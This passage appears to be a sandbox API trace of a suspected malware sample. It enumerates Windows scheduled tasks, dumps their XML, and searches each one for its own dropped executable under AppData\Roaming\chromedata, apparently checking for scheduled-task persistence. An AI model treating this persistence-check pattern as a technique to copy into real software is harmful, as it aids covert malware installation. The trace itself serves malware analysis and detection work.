	[0099.462] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x10, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.462] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="PvrScheduleTask") returned 0x0
	[0099.462] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.464] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrScheduleTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-135)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-136)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrSchedule</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{CEF51277-5358-477b-858C-4E14F0C80BF7}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.491] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.491] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x11, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.491] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="RecordingRestart") returned 0x0
	[0099.491] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.495] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RecordingRestart</URI>\r\n    <Date>1982-01-15T16:30:00-08:00</Date>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-127)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-128)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>6</Priority>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehrec</Command>\r\n      <Arguments>/RestartRecording</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.518] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.518] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x12, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.518] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="RegisterSearch") returned 0x0
	[0099.518] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.521] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\RegisterSearch</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-24)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoRegisterSearch $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.540] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.540] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x13, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.540] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="ReindexSearchRoot") returned 0x0
	[0099.540] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.543] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\ReindexSearchRoot</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-26)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoReindexSearchRoot</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.562] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.562] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x14, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.562] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="SqlLiteRecoveryTask") returned 0x0
	[0099.562] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.564] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\SqlLiteRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-133)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-134)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-SqlLiteRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{59116E30-02BD-4b84-BA1E-5D77E809B1A2}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.594] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.594] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x15, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0099.594] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="UpdateRecordPath") returned 0x0
	[0099.594] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0099.597] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\UpdateRecordPath</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-13)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;AU)(A;;FXFR;;;S-1-5-80-567955335-3455378119-3305749985-2554534624-1867504835)(A;OICI;FRFWFXDTDCSD;;;S-1-5-80-3864065939-1897331054-469427076-3133256761-1570309435)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/DoUpdateRecordPath $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0099.617] IUnknown:Release (This=0x63ff70) returned 0x0
	[0099.617] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.617] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0099.619] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=1) returned 0x0
	[0099.619] ITaskFolderCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppFolder=0x128e54 | out: ppFolder=0x128e54*=0x63ff78) returned 0x0
	[0099.619] ITaskFolder:GetTasks (in: This=0x63ff78, flags=1, ppTasks=0x128d28 | out: ppTasks=0x128d28*=0x63ffa8) returned 0x0
	[0099.620] IRegisteredTaskCollection:get_Count (in: This=0x63ffa8, pCount=0x128d18 | out: pCount=0x128d18*=0) returned 0x0
	[0099.620] IUnknown:Release (This=0x63ffa8) returned 0x0
	[0099.620] ITaskFolder:GetFolders (in: This=0x63ff78, flags=0, ppFolders=0x128d1c | out: ppFolders=0x128d1c*=0x16900a8) returned 0x0
	[0099.621] ITaskFolderCollection:get_Count (in: This=0x16900a8, pCount=0x128d14 | out: pCount=0x128d14*=0) returned 0x0
	[0099.621] IUnknown:Release (This=0x16900a8) returned 0x0
	[0099.622] TaskScheduler:IUnknown:Release (This=0x63ff78) returned 0x0
	[0099.622] IUnknown:Release (This=0x63fe88) returned 0x0
	[0099.622] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0099.622] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0xe, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0099.622] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe90) returned 0x0
	[0099.624] IRegisteredTaskCollection:get_Count (in: This=0x63fe90, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0099.624] IRegisteredTaskCollection:get_Item (in: This=0x63fe90, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff88) returned 0x0
	[0099.625] IRegisteredTask:get_Name (in: This=0x63ff88, pName=0x128e3c | out: pName=0x128e3c*="CorruptionDetector") returned 0x0
	[0099.625] IRegisteredTask:get_Xml (in: This=0x63ff88, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\memdiag.dll,-230)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\memdiag.dll,-231)</Source>\r\n    <URI>\\Microsoft\\Windows\\MemoryDiagnostic\\CorruptionDetector</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(D;;GA;;;BG)(D;;GA;;;AN)(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRSD;;;BU)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%SystemRoot%\\system32\\memdiag.dll,-232)</Description>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <Hidden>true</Hidden>\r\n  </Settings>\r\n  